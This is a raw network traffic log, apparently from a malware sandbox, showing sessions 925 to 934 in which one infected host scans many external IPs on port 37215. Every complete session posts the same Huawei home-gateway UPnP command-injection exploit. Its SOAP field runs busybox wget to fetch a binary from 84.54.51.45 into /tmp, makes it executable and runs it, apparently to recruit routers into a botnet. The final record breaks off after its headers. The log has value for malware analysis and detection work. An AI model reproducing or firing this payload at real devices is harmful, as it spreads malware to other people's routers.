                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            925192.168.2.153471841.236.93.10237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745409966 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            926192.168.2.154474441.91.78.21937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745434046 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            927192.168.2.154596641.50.8.23437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745471001 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            928192.168.2.155674641.125.49.9237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745486975 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            929192.168.2.155332441.48.222.837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745510101 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            930192.168.2.154243041.103.13.14537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745568037 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            931192.168.2.155822841.27.206.21437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745568037 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            932192.168.2.154296241.31.93.5337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745596886 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            933192.168.2.154890641.222.113.22537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745678902 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            934192.168.2.155199641.167.124.24437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.745702028 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
